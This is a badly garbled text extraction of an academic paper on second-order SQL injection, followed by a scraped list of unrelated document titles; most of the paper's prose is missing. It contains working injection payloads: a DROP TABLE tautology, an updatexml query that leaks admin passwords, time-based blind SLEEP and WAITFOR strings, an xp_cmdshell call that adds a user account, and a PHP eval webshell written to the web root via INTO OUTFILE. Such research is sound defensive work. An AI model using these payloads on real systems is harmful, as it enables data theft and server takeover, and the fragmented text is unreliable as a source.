Research on second-order SQL injection techniques

Size: px
Start display at page:

Download "Research on second-order SQL injection techniques"

Transcription

1 36 Z1 Vol.36 No.Z Journal on Communications November 2015 doi: /j.issn x SQL ( ) Web 3 SQL SQL SQL SQL 3 SQL Web 3 SQL SQL TP393 A Research on second-order SQL injection techniques LE De-guang 1, LI Xin 2, GONG Sheng-rong 1, ZHENG Li-xin 2 (1. Scholl of Computer Science & Engineering, Changshu Institute of Technology, Changshu , China; 2. College of Engineering, Huaqiao University, Quanzhou , China) Abstract: With the environment of new Web technologies, three kinds of second-order SQL injection techniques were proposed: blind second-order SQL injection, second-order SQL injection attacks the operating system and client second-order SQL injection. Experiments show that second-order SQL injection vulnerabilities exist widely in Web applications, and the proposed new second-order injection techniques can effectively commit attacks both server and client. Key words: SQL; second order SQL injection; blind injection; attack payload 1 Web Web Web OWASP open Web application security project SQL Web [1] SQL [2~7] SQL SQL SQL SQL SQL YAN [8] SQL SQL [9] SQL SQL HTML5 Web SQL SQL SQL HTML5 SQL SQL SQL SQL SQL Web ( ); (2013H2002) Foundation Items: The National Natural Science of Foundation of China( ); Fujian Internet of Things and Cloud Computing Program(2013H2002)

2 86 36 SQL SQL HTML5 SQL SQL SQL 2 SQL 2.1 SQL SQL Web Web SQL SQL [10] SQL [11] login.php $link = mysql_connect( localhost, root, root ); $query = SELECT * FROM Users WHERE username = $_POST[ username ] AND password = $_POST[ password ] ; $result = mysql_query( $query ) POST SQL username OR 1=1;DROP TABLE Users; --password SQL SELECT * FROM Users WHERE username = OR 1=1; DORP TABLE Users; -- AND password = SQL Users 1 SQL 1 SQL 1 Web Web SQL Web Web HTML SQL [12] 2.2 SQL SQL SQL SQL SQL 2 Web SQL [13] SQL Web Web SQL SQL $link = new mysqli ( localhost, root, root ); $query = INSERT INTO Users VALUES (?,?,? ) ; $cmd = $link->prepare ($qurey); $cmd->bind_param ( sss, $username, $password, $ ) ; $cmd->execute() SQL username password SQL SQL 123 WHERE 1=(updatexml(1,concat(0x5e24,(select password from admin limit 1),0x5e24),1)); -- Web

3 Z1 SQL 87 SQL $query = SELECT * FROM Users WHERE username=? AND password =? ; $result = mysql_query ($query) SQL username password Web SQL Web $result = mysql_query ($query); $row = mysql_fetch_array ($result); $username = $row[ username ]; $ = $row[ ]; $password = $_POST[ newpwd ]; $query = UPDATE Users SET username = $username, password = $password, = $emal WHERE username= $username ; ; $rs = mysql_query ($query) username password UPDATE SQL SQL UPDATE Users SET username =, password =, = 123 WHERE 1=(updatexml(1,concat(0x5e24,(select password from admin limit 1),0x5e24),1)); -- WHERE username= SQL updatexml() XPath admin SQL SQL 3 3 SQL (1)~5)) (6)~21))2 Web Web Web INSERT/UPDATE Web SQL Web Web SQL Web SQL SQL SQL 3 SQL SQL SQL SQL SQL Web 3 18 ~21 Web SQL / SQL SQL SQL SQL 3 SQL SQL 3 SQL 3.1 SQL SQL SQL SQL SQL SQL Web SQL [14] [15~17] SQL Web SQL [18] [19,20]

4 SQL 2 Web Web SQL SQL SELECT * FROM Article WHERE title = test AND 2=3 SQL SELECT * FROM Article WHERE title = 123 AND 2 = 3 2 = 3 false id = 1 WHERE false Web Test AND 3=3 SQL WHERE trueand 3=3 SQL SQL Web SQL test ;SELECT (IF ( user() = root ), SLEEP (4), 1 )Web SQL SELECT * FROM Article WHERE title = test ;SELECT ( IF ( user() = root ), SLEEP (4), 1) Web SLEEP(4) 4 s root 1 1 SQL Server WAITFOR DELAY 0:0:7 MySQL SLEEP (7); BENCHMARK ( ,md5( abc )) Oracle PostgreSQL BEGIN DBMS_LOCK.SLEEP( 7); END; SELECT UTL_INADDR.get_host_address ( test ) FROM dual; PG_SLEEP(7); GENERATE_SERIES(1, ) SQL A B B Web SQL 4 SQL SQL SQL Web

5 Z1 SQL 89 SQL WAF SQL SQL SQL WAF SQL 4 SQL 3.2 SQL SQL Server Oracle MySQL SQL xp_cmdshell EXEC master..xp_cmdshell net user john /add 2 2 MySQL MS-SQL Oracle LOAD DATA INFILE SELECT INTO OUT- LOAD_FILE SELECT INTO FILE(DUMPFILE) OUTFILE(DUMPFILE) BULK INSERT OLE Automation CLR Extend stored procedure BCP OLE Automation CLR Extend stored procedure Utl_file_dir/Oracle directories Oracle EXTPROC Java Java Oracle DBMS_SCHEDULER DBMS_ADVISOR SQL SQL Server sa MySQL FILE Web Web SELECT INSERT UPDATE SQL / INSERT FILE SQL Test ;SELECT <?php eval($_post[pass])?> INTO OUTFILE /var/www/a.php INSERT Web SQL SELECT * FROM Article WHERE title = Test ;SELECT <?php eval($_post[pass])?> INTO OUTFILE /var/www/a.php Web /var/www/ a.php Webshell SQL Web 3.3 SQL HTML5 SQL [21] JavaScript SQLite Webdb test id name var db; if (window.opendatabase){ db = opendatabase ( Webdb, 1.0, Web SQL Databses, ) ; db.transaction (function(tx){ tx.executesql ( CREATE TABLE IF NOT EXISTS test ( id int unique, name varchar(50), varchar(50) ) ) ; }); } HTML5 Web Web Web Web

6 90 36 HTML5 SQL SQL SQL 2 SQL SQL Web SQL 5 5 SQL 5 SQL 2 SQL Web Web SQL 2 SQL ID UPDATE SQL 4 3 SQL SQL 3 SQL Alexa [22] 30 SQL SQL 30 SQL SQL UPDATE SELECT 3 SELECT UPDATE INSERT 3 4 SQL SQL Linux+MySQL Web FILE LOAD_FILE SQL Server wscript.shell Oracle Java IO DBMS_JAVA_TEST.FUNCALL SQL

7 Z1 SQL SQL.... SQL /30 SQL /30 SQL / SQL SQL SQL UPDATE INSERT 2 SQL 2 SQL UPDATE SELECT SELECT 2 SQL.... SQL SQL SQL 3 SQL.... SQL SQL SELECT SLQ SQL SQL 36.67% 3 SQL Web SQL SQL 16.67% SQL Web sa root MySQL+Linux SQL 20% HTML5 6 PHP+MySQL+Apache+Linux SQL Web Web SQL $query = SELECT * FROM Users; ; $result = mysql_query ($query); $row = mysql_fetch_array ($result); $username = $row[ username ]; $ = $row[ ]; $password = $_POST[ newpwd ]; $query = UPDATE Users SET username = $username, password = $password, = $emal WHERE username= $username ; ; $rs = mysql_query ($query) Web Web

8 92 36 WAF SQL [23] 5 SQL 3 SQL 5 SQL WAF SQL SQL SQL 5 3 SQL SQL Web SQL SQL 3 SQL 3 SQ SQL SQL SQL SQL Web SQL WAF SQL 3 SQL 2 WAF WAF 3 SQL SQL HTML5 SQL 5 SQL Web Web SQL SQL SQL 3 SQL Web SQL [1] OSWAP. Category: OWASP top ten project [EB/OL]. [2],,,. SQL-on-Hadoop [J].,2014,35(Z1): ZHANG S Y JIANG K D WEI J W, et al. Network log analysis with SQL-on-Hadoop[J]. Journal on Communications, 2014, 35(Z1): [3] KIM M Y, LEE D H. Data-mining based SQL injection attack detection using internal query trees[j]. Expert Systems with Applications, 2014,41 (11): [4] SHAR L K, TAN H B K. Predicting SQL injection and cross site scripting vulnerabilities through mining input sanitization patterns[j]. Information and Software Technology, 2013,55(10): [5] JANG Y S, CHOI J Y. Detecting SQL injection attacks using query result size[j]. Computers & Security, 2014,44(7): [6] SHAR L K, TAN H B K. Defeating SQL injection[j]. IEEE Computer, 2013,46(3): [7],,,. Web SQL [J].,2012,22(11): TIAN W, XU J, YANG J F, et al. Model-driven penetration test of the SQL injection in Web applications[j]. Chinese High Technology Letters, 2012,22(11): [8] YAN L, LI X H, FENG R T, et al. Detection method of the second-order SQL injection in Web applications[j]. Lecture Notes in Computer Science, 2014, 8332: [9],,,. SQL [J].,2014,(11): TIAN Y J, ZHAO Z M, ZHANG H C, et al. Second-order SQL injection attack defense model [J]. Netinfo Security, 2014,(11): [10] PINZONA C I, PAZB J F D, HERRERO Á, et al. idmas-sql: intrusion detection based on MAS to detect and block SQL injection through data mining[j]. Information Sciences, 2013,231(5): [11] KIEYZUN A, GUO P J, JAYARAMAN K, et al. Automatic creation of

9 Z1 SQL 93 SQL Injection and cross-site scripting attacks[a]. Proceedings of the 31st International Conference on Software Engineering (ICSE), IEEE Computer Society[C]. Washington, DC, USA, [12] HALFOND W G J VIEGAS J ORSO A. A classification of SQL injection attacks and countermeasures[a]. Proceedings of the International Conference on Software Engineering[C]. Arlington, VA, USA, [13] DAHSE J, HOLZ T. Static detection of second-order vulnerabilities in Web applications[a]. Proceedings of the 23rd USENIX Conference on Security Symposium (USENIX)[C] [14] FOCARDI R, LUCCIO F L. SQUARCINA M. Fast SQL blind injections in high latency networks[a]. Proceedings of IEEE First AESS European Conference on Satellite Telecommunications (ESTEL)[C] [15] SADEGHIAN A, ZAMANI M, IBRAHIM S. SQL injection is still alive: a study on SQL injection signature evasion techniques[a]. Proceedings of International Conference on Informatics and Creative Multimedia (ICICM)[C] [16],,. [J].,2012,49(11): WANG Y LI Z J GUO T, et al. Literal tainting method for preventing code injection attack in Web application [J]. Journal of Computer Research and Development, 2012,49(11): [17],.SQL [J].,2012,39(z3):9-13. WANG W M LI H W. Research of the active defense technology for the SQL server injection attack [J]. Computer Science, 2012,39(z3): [18] DAHSE J, KREINN N, HOLZ T. Code reuse attacks in PHP: automated POP chain generation[a]. Proceedings of ACM SIGSAC Conference on Computer and Communications Security (CCS)[C]. New York, NY, USA, [19] MICROSOFT. Time-based blind SQL injection with heavy queries[eb/ol]. aspx [20] Practical identification of SQL injection vulnerabilities[eb/ol]. -Identification.pdf [21] MEIYAPPAN Y. Using the Web SQL database API in HTML 5 [EB/OL]. Using-the-Web-SQL-Database-API-in-HTML-5.htm [22] ALEXA. The top 1000 sites on the Web [EB/OL]. com/ topsites [23] BANDHAKAVF S, BISHT P, MADHUSUDAN P, et al. CANDID preventing SQL injection attacks using dynamic candidate evaluations [A]. Proceedings of the 14th ACM Conference on Computer and Communications Security (CCS)[C]. New York, NY, USA, ) 1990-) 1966-) 1967-)

Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion

Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion IN5290 Ethical Hacking Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion Universitetet i Oslo Laszlo Erdödi Lecture Overview What is SQL injection

More information

ANALYSIS OF VARIOUS LEVELS OF PENETRATION BY SQL INJECTION TECHNIQUE THROUGH DVWA

ANALYSIS OF VARIOUS LEVELS OF PENETRATION BY SQL INJECTION TECHNIQUE THROUGH DVWA ANALYSIS OF VARIOUS LEVELS OF PENETRATION BY SQL INJECTION TECHNIQUE THROUGH DVWA By Ashish Kumar, Dr. Swapnesh Taterh 1st AIIT, Amity University, Rajasthan. 2nd Asst Prof, AIIT, Amity University, Rajasthan.

More information

Secure Web App. 제목 : Secure Web Application v1.0 ( 채수민책임 ) Copyright 2008 Samsung SDS Co., Ltd. All rights reserved - 1 -

Secure Web App. 제목 : Secure Web Application v1.0 ( 채수민책임 ) Copyright 2008 Samsung SDS Co., Ltd. All rights reserved - 1 - Secure Web App. Copyright 2008 Samsung SDS Co., Ltd. All rights reserved - 1 - Building & Testing Secure Web Applications By Aspect Security Copyright 2008 Samsung SDS Co., Ltd. All rights reserved - 2

More information

Development Technologies. Agenda: phpmyadmin 2/20/2016. phpmyadmin MySQLi. Before you can put your data into a table, that table should exist.

Development Technologies. Agenda: phpmyadmin 2/20/2016. phpmyadmin MySQLi. Before you can put your data into a table, that table should exist. CIT 736: Internet and Web Development Technologies Lecture 10 Dr. Lupiana, DM FCIM, Institute of Finance Management Semester 1, 2016 Agenda: phpmyadmin MySQLi phpmyadmin Before you can put your data into

More information

Secure Programming Lecture 8++: SQL Injection

Secure Programming Lecture 8++: SQL Injection Secure Programming Lecture 8++: SQL Injection David Aspinall, Informatics @ Edinburgh 9th February 2016 Outline Overview Other past attacks More examples Classification Injection route and motive Forms

More information

Multi-hashing for Protecting Web Applications from SQL Injection Attacks

Multi-hashing for Protecting Web Applications from SQL Injection Attacks Multi-hashing for Protecting Web Applications from SQL Injection Attacks Yogesh Bansal, Jin H. Park* Computer Science, California State University, Fresno, CA 93740, U.S.A. * Corresponding author. Email:

More information

Injection attacks use specially crafted inputs to subvert the intended operation of applications.

Injection attacks use specially crafted inputs to subvert the intended operation of applications. Secure Programming Lecture 8: SQL Injection David Aspinall, Informatics @ Edinburgh 8th February 2018 Recap Injection attacks use specially crafted inputs to subvert the intended operation of applications.

More information

Module 14: SQL Injection

Module 14: SQL Injection Module 14: SQL Injection Objective The objective of this lab is to provide expert knowledge on SQL Injection attacks and other responsibilities that include: Understanding when and how web application

More information

IELM 511 Information Systems Design Labs 5 and 6. DB creation and Population

IELM 511 Information Systems Design Labs 5 and 6. DB creation and Population IELM 511 Information Systems Design Labs 5 and 6. DB creation and Population In this lab, your objective is to learn the basics of creating and managing a DB system. One way to interact with the DBMS (MySQL)

More information

NAVEX: Precise and Scalable Exploit Generation for Dynamic Web Applications

NAVEX: Precise and Scalable Exploit Generation for Dynamic Web Applications NAVEX: Precise and Scalable Exploit Generation for Dynamic Web Applications Abeer Alhuzali, Rigel Gjomemo, Birhanu Eshete, and V.N. Venkatakrishnan University of Illinois at Chicago 1 Web Applications

More information

Vol. 40 No Journal of Jiangxi Normal University Natural Science Jul SQL. SQL Web SQLIDL DFA. SecuriBench

Vol. 40 No Journal of Jiangxi Normal University Natural Science Jul SQL. SQL Web SQLIDL DFA. SecuriBench 40 4 Vol 40 No 4 2016 7 Journal of Jiangxi Normal University Natural Science Jul 2016 1000-5862 2016 04-0386-06 SQL * 330022 Web SQL Web SQLIDL DFA SecuriBench SQL SQL TP 311 A DOI 10 16357 /j cnki issn1000-5862

More information

TIMING-BASED ATTACKS IN WEB APPLICATIONS

TIMING-BASED ATTACKS IN WEB APPLICATIONS TIMING-BASED ATTACKS IN WEB APPLICATIONS ABOUT ME Ahmad Ashraff @Yappare Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member Of OWASP

More information

Preventing Injection Vulnerabilities through Context-Sensitive String Evaluation (CSSE)

Preventing Injection Vulnerabilities through Context-Sensitive String Evaluation (CSSE) IBM Zurich Research Laboratory Preventing Injection Vulnerabilities through Context-Sensitive String Evaluation (CSSE) Tadeusz Pietraszek Chris Vanden Berghe RAID

More information

The design and implementation of network attack and defense platform based on cloud desktop

The design and implementation of network attack and defense platform based on cloud desktop Journal of Physics: Conference Series PAPER OPEN ACCESS The design and implementation of network attack and defense platform based on cloud desktop To cite this article: Zining Yan et al 2017 J. Phys.:

More information

CHAPTER 10. Connecting to Databases within PHP

CHAPTER 10. Connecting to Databases within PHP CHAPTER 10 Connecting to Databases within PHP CHAPTER OBJECTIVES Get a connection to a MySQL database from within PHP Use a particular database Send a query to the database Parse the query results Check

More information

PHP. How Web Applications interact with server side databases CRUD. Connecting and using mysql from PHP PHP provides many mysql specific functions

PHP. How Web Applications interact with server side databases CRUD. Connecting and using mysql from PHP PHP provides many mysql specific functions PHP How Web Applications interact with server side databases CRUD Connecting and using mysql from PHP PHP provides many mysql specific functions mysql_connect mysql_select_db mysql_query mysql_fetch_array

More information

Detecting SQLIA using execution plans

Detecting SQLIA using execution plans Graduate Theses and Dissertations Graduate College 2016 Detecting SQLIA using execution plans Sriram Nagarajan Iowa State University Follow this and additional works at: http://lib.dr.iastate.edu/etd Part

More information

Defining Injection Attacks

Defining Injection Attacks Defining Injection Attacks RA: Donald Ray dray3@cse.usf.edu PI: Jay Ligatti ligatti@cse.usf.edu Motivation Output Program Application Inputs Motivation 123456 Application Output Program Inputs SELECT balance

More information

Server side scripting and databases

Server side scripting and databases Example table Server side scripting and databases student How Web Applications interact with server side databases - part 2 student kuid lastname money char char int student table Connecting and using

More information

PHP: Cookies, Sessions, Databases. CS174. Chris Pollett. Sep 24, 2008.

PHP: Cookies, Sessions, Databases. CS174. Chris Pollett. Sep 24, 2008. PHP: Cookies, Sessions, Databases. CS174. Chris Pollett. Sep 24, 2008. Outline. How cookies work. Cookies in PHP. Sessions. Databases. Cookies. Sometimes it is useful to remember a client when it comes

More information

Client-Side Detection of SQL Injection Attack

Client-Side Detection of SQL Injection Attack Client-Side Detection of SQL Injection Attack Hossain Shahriar, Sarah North, and Wei-Chuen Chen Department of Computer Science Kennesaw State University Georgia, 30144, USA {hshahria,snorth}@kennesaw.edu,

More information

A SQL Injection : Internal Investigation of Injection, Detection and Prevention of SQL Injection Attacks

A SQL Injection : Internal Investigation of Injection, Detection and Prevention of SQL Injection Attacks A SQL Injection : Internal Investigation of Injection, Detection and Prevention of SQL Injection Attacks Abhay K. Kolhe Faculty, Dept. Of Computer Engineering MPSTME, NMIMS Mumbai, India Pratik Adhikari

More information

Extending Enterprise Services Descriptive Metadata with Semantic Aspect Based on RDF

Extending Enterprise Services Descriptive Metadata with Semantic Aspect Based on RDF Extending Enterprise Services Descriptive Metadata with Semantic Aspect Based on RDF Lei Zhang, Yani Yan and Jianlin Wu Beijing Key Laboratory of Intelligent Communications Software and Multimedia, Beijing

More information

PHP Development - Introduction

PHP Development - Introduction PHP Development - Introduction Php Hypertext Processor PHP stands for PHP: Hypertext Preprocessor PHP is a server-side scripting language, like ASP PHP scripts are executed on the server PHP supports many

More information

I n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures:

I n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures: This time Continuing with Software Security Getting insane with I n p u t sanitization ); drop table slides New attacks and countermeasures: SQL injection Background on web architectures A very basic web

More information

Research and Design of Education and Teaching Resource Management System based on ASP.NET Technology

Research and Design of Education and Teaching Resource Management System based on ASP.NET Technology 2018 3rd International Conference on Education & Education Research (EDUER 2018) Research and Design of Education and Teaching Resource Management System based on ASP.NET Technology Jin Xin Science and

More information

Let me SQL inject your heart!

Let me SQL inject your heart! _ (in)security we trust _!! SecurIMAG 2012-02-09 Let me SQL inject your heart! Injection vulnerabilities are common for web applications. Some do target databases: «SQL injections». The impact when exploiting

More information

A1 (Part 2): Injection SQL Injection

A1 (Part 2): Injection SQL Injection A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a password manager is a good idea! SQL injection is ironic SQL injection is funny Firewall Firewall Accounts

More information

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection Pattern Recognition and Applications Lab Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection Igino Corona igino.corona _at_ diee.unica.it Computer Security May 2nd,

More information

Databases and SQL. Lecture outline. CSE 190 M (Web Programming) Spring 2008 University of Washington

Databases and SQL. Lecture outline. CSE 190 M (Web Programming) Spring 2008 University of Washington Databases and SQL CSE 190 M (Web Programming) Spring 2008 University of Washington References: SQL syntax reference, w3schools tutorial Except where otherwise noted, the contents of this presentation are

More information

More loops. Control structures / flow control. while loops. Loops / Iteration / doing things over and over and over and over...

More loops. Control structures / flow control. while loops. Loops / Iteration / doing things over and over and over and over... Control structures / flow control More loops while loops if... else Switch for loops while... do.. do... while... Much of this material is explained in PHP programming 2nd Ed. Chap 2 Control structures

More information

Mysql Workbench Import Sql No Database. Selected >>>CLICK HERE<<<

Mysql Workbench Import Sql No Database. Selected >>>CLICK HERE<<< Mysql Workbench Import Sql No Database Selected Mar 14, 2015. I tried several Versions of Workbench, with 6.2.5 it was possible again to Export my databases. ERROR 1046 (3D000) at line 22: No database

More information

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11 Attacks Against Websites Tom Chothia Computer Security, Lecture 11 A typical web set up TLS Server HTTP GET cookie Client HTML HTTP file HTML PHP process Display PHP SQL Typical Web Setup HTTP website:

More information

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le Web Security Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le Topics Web Architecture Parameter Tampering Local File Inclusion SQL Injection XSS Web Architecture Web Request Structure Web Request Structure

More information

Implementation and performance test of cloud platform based on Hadoop

Implementation and performance test of cloud platform based on Hadoop IOP Conference Series: Earth and Environmental Science PAPER OPEN ACCESS Implementation and performance test of cloud platform based on Hadoop To cite this article: Jingxian Xu et al 2018 IOP Conf. Ser.:

More information

Practical Automated Web Application Attack Techniques Justin Clarke Gotham Digital Science Gotham Digital Science Ltd

Practical Automated Web Application Attack Techniques Justin Clarke Gotham Digital Science Gotham Digital Science Ltd Practical Automated Web Application Attack Techniques Justin Clarke Gotham Digital Science Why this talk? The techniques are well known, but how about some way of applying ppy them? Commercial tools are

More information

Blind Sql Injection with Regular Expressions Attack

Blind Sql Injection with Regular Expressions Attack Blind Sql Injection with Regular Expressions Attack Authors: Simone Quatrini Marco Rondini 1/9 Index Why blind sql injection?...3 How blind sql injection can be used?...3 Testing vulnerability (MySQL -

More information

Announcements. PS 3 is out (see the usual place on the course web) Be sure to read my notes carefully Also read. Take a break around 10:15am

Announcements. PS 3 is out (see the usual place on the course web) Be sure to read my notes carefully Also read. Take a break around 10:15am Announcements PS 3 is out (see the usual place on the course web) Be sure to read my notes carefully Also read SQL tutorial: http://www.w3schools.com/sql/default.asp Take a break around 10:15am 1 Databases

More information

Lecture 13: MySQL and PHP. Monday, March 26, 2018

Lecture 13: MySQL and PHP. Monday, March 26, 2018 Lecture 13: MySQL and PHP Monday, March 26, 2018 MySQL The Old Way In older versions of PHP, we typically used functions that started with mysql_ that did not belong to a class For example: o o o o mysql_connect()

More information

Tautology based Advanced SQL Injection Technique A Peril to Web Application

Tautology based Advanced SQL Injection Technique A Peril to Web Application IJIRST National Conference on Latest Trends in Networking and Cyber Security March 2017 Tautology based Advanced SQL Injection Technique A Peril to Web Application Kritarth Jhala 1 Shukla Umang D 2 2 Department

More information

NET 311 INFORMATION SECURITY

NET 311 INFORMATION SECURITY NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)

More information

Understanding Advanced Blind SQLI attack

Understanding Advanced Blind SQLI attack Understanding Advanced Blind SQLI attack Amit Dabas, Ashish Kumar Sharma Cyber Forensics & Information Security, MDU,amitdab@gmail.com,+918588831807 Abstract SQL Injection is not new attack to our web

More information

EnterSpace Data Sheet

EnterSpace Data Sheet EnterSpace 7.0.4.3 Data Sheet ENTERSPACE BUNDLE COMPONENTS Policy Engine The policy engine is the heart of EnterSpace. It evaluates digital access control policies and makes dynamic, real-time decisions

More information

Web Penetration Testing

Web Penetration Testing Web Penetration Testing What is a Website How to hack a Website? Computer with OS and some servers. Apache, MySQL...etc Contains web application. PHP, Python...etc Web application is executed here and

More information

Web Application Penetration Testing

Web Application Penetration Testing Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate

More information

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Advanced Web Technology 10) XSS, CSRF and SQL Injection Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 1 Table of Contents Cross Site Request Forgery - CSRF Presentation

More information

AUTO GENERATION OF CODE AND TABLE TOOL

AUTO GENERATION OF CODE AND TABLE TOOL Available Online at www.ijcsmc.com International Journal of Computer Science and Mobile Computing A Monthly Journal of Computer Science and Information Technology IJCSMC, Vol. 4, Issue. 4, April 2015,

More information

IS 2150 / TEL 2810 Introduction to Security

IS 2150 / TEL 2810 Introduction to Security IS 2150 / TEL 2810 Introduction to Security James Joshi Professor, SIS Lecture 15 April 20, 2016 SQL Injection Cross-Site Scripting 1 Goals Overview SQL Injection Attacks Cross-Site Scripting Attacks Some

More information

Injection vulnerabilities: command injection and SQL injection

Injection vulnerabilities: command injection and SQL injection Injection vulnerabilities: command injection and SQL injection Questões de Segurança em Engenharia de Software (QSES) Departamento de Ciência de Computadores Faculdade de Ciências da Universidade do Porto

More information

Identification and Defense Mechanisms for XSS Attack

Identification and Defense Mechanisms for XSS Attack Identification and Defense Mechanisms for XSS Attack Nency Patel Department of Computer Engineering D.J.Sanghavi College of engineering Mumbai, India Narendra Shekokar Department of Computer Engineering

More information

SQL Injection SPRING 2018: GANG WANG

SQL Injection SPRING 2018: GANG WANG SQL Injection SPRING 2018: GANG WANG SQL Injection Another reason to validate user input data Slides credit to Neil Daswani and Adam Doupé 2 3 http://xkcd.com/327/ Produce More Secure Code Operating system

More information

Who s Afraid of SQL Injection?! Mike Kölbl Sonja Klausburg Siegfried Goeschl

Who s Afraid of SQL Injection?! Mike Kölbl Sonja Klausburg Siegfried Goeschl Who s Afraid of SQL Injection?! Mike Kölbl Sonja Klausburg Siegfried Goeschl 1 http://xkcd.com/327/ 2 What Is SQL Injection? Incorrectly validated or nonvalidated string literals are concatenated into

More information

SQL Injection Attack & Its Prevention

SQL Injection Attack & Its Prevention e-issn 2455 1392 Volume 2 Issue 6, June 2016 pp. 349 354 Scientific Journal Impact Factor : 3.468 http://www.ijcter.com SQL Injection Attack & Its Prevention Amey Anil Patil L.B.H.S.S.T s Institute Of

More information

CS108 Lecture 19: The Python DBAPI

CS108 Lecture 19: The Python DBAPI CS108 Lecture 19: The Python DBAPI Sqlite3 database Running SQL and reading results in Python Aaron Stevens 6 March 2013 What You ll Learn Today Review: SQL Review: the Python tuple sequence. How does

More information

A Static-Dynamic Conjunct Windows Process Integrity Detection Model

A Static-Dynamic Conjunct Windows Process Integrity Detection Model A Static-Dynamic Conjunct Windows Process Integrity Detection Model Fei Chen 1, Yi Li 1, Tong Zhang 1, Kehe Wu 1, 1 North China Electric Power University, Department of Control and Computer Engineering,

More information

Hao Chen Benjamin Davis. University of California, Davis. HELIX Project Review Meeting, August 6,2010

Hao Chen Benjamin Davis. University of California, Davis. HELIX Project Review Meeting, August 6,2010 Hao Chen Benjamin Davis University of California, Davis HELIX Project Review Meeting, August 6,2010 Goal: protect systems at high level Web services are highly attractive targets Over 60% of attacks target

More information

WEB SECURITY: SQL INJECTION

WEB SECURITY: SQL INJECTION WEB SECURITY: SQL INJECTION CMSC 414 FEB 15 2018 A very basic web architecture Client Server A very basic web architecture Client Server A very basic web architecture Client Server A very basic web architecture

More information

Chapter. Accessing MySQL Databases Using PHP

Chapter. Accessing MySQL Databases Using PHP Chapter 12 Accessing MySQL Databases Using PHP 150 Essential PHP fast Introduction In the previous chapter we considered how to create databases using MySQL. While this is useful, it does not enable us

More information

Data in Transit Validation for Cloud Computing Using Cloud- Based Algorithm Detection of Injected Objects

Data in Transit Validation for Cloud Computing Using Cloud- Based Algorithm Detection of Injected Objects Indonesian Journal of Electrical Engineering and Computer Science Vol. 10, No. 1, April 2018, pp. 348~353 ISSN: 2502-4752, DOI: 10.11591/ijeecs.v10.i1.pp348-353 348 Data in Transit Validation for Cloud

More information

MySQL: Querying and Using Form Data

MySQL: Querying and Using Form Data MySQL: Querying and Using Form Data CISC 282 November 15, 2017 Preparing Data $mysqli >real_escape_string($datavalue); Requires a $mysqli object Functional version mysqli_real_escape_string( ) does not

More information

Secure Coding and Code Review. Berlin : 2012

Secure Coding and Code Review. Berlin : 2012 Secure Coding and Code Review Berlin : 2012 Outline Overview of top vulnerabilities Code review practice Secure design / writing secure code Write some secure code Review a volunteer's code Top Problems

More information

2017 Politecnico di Torino 1

2017 Politecnico di Torino 1 SQL for the applications Call Level Interface Requests are sent to the DBMS through functions of the host language solution based on predefined interfaces API, Application Programming Interface SQL instructions

More information

SQL INJECTION IN WEB APPLICATIONS By Roshmi Choudhury,Officer (IT) Numaligarh Refinery Limited

SQL INJECTION IN WEB APPLICATIONS By Roshmi Choudhury,Officer (IT) Numaligarh Refinery Limited SQL INJECTION IN WEB APPLICATIONS By Roshmi Choudhury,Officer (IT) Numaligarh Refinery Limited Abstract It may be too late to shut the stable door after the horse has been stolen. Most companies in the

More information

The Skill Research of Interactive Web Site Based on.net: The Design and Development Yanwei XU 1, a, Honghui GONG 2, Ting ZHANG 3

The Skill Research of Interactive Web Site Based on.net: The Design and Development Yanwei XU 1, a, Honghui GONG 2, Ting ZHANG 3 3rd International Conference on Machinery, Materials and Information Technology Applications (ICMMITA 2015) The Skill Research of Interactive Web Site Based on.net: The Design and Development Yanwei XU

More information

ThingWorx Relational Databases Connectors Extension User Guide

ThingWorx Relational Databases Connectors Extension User Guide ThingWorx Relational Databases Connectors Extension User Guide Version 1.0 Software Change Log... 2 Introduction and Installation... 2 About the Relational Databases Connectors Extension... 2 Installing

More information

2017 Politecnico di Torino 1

2017 Politecnico di Torino 1 SQL for the applications Call Level Interface Requests are sent to the DBMS through functions of the host language solution based on predefined interfaces API, Application Programming Interface SQL instructions

More information

Web Application Attacks

Web Application Attacks Web Application Attacks What can an attacker do and just how hard is it? By Damon P. Cortesi IOActive, Inc. Comprehensive Computer Security Services www.ioactive.com cortesi:~

More information

Web Application Defense with Bayesian Attack Analysis

Web Application Defense with Bayesian Attack Analysis Web Application Defense with Bayesian Attack Analysis Presented by: Ryan Barnett Senior Security Researcher OWASP ModSecurity CRS Leader Ryan Barnett - Background Trustwave Senior Security Researcher Member

More information

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1 Agenda Introduction What are Web Applications?

More information

Understanding Basic SQL Injection

Understanding Basic SQL Injection Understanding Basic SQL Injection SQL injection (also known as SQLI) is a code injection technique that occurs if the user-defined input data is not correctly filtered or sanitized of the string literal

More information

Database Design on Construction Project Cost System Nannan Zhang1,a, Wenfeng Song2,b

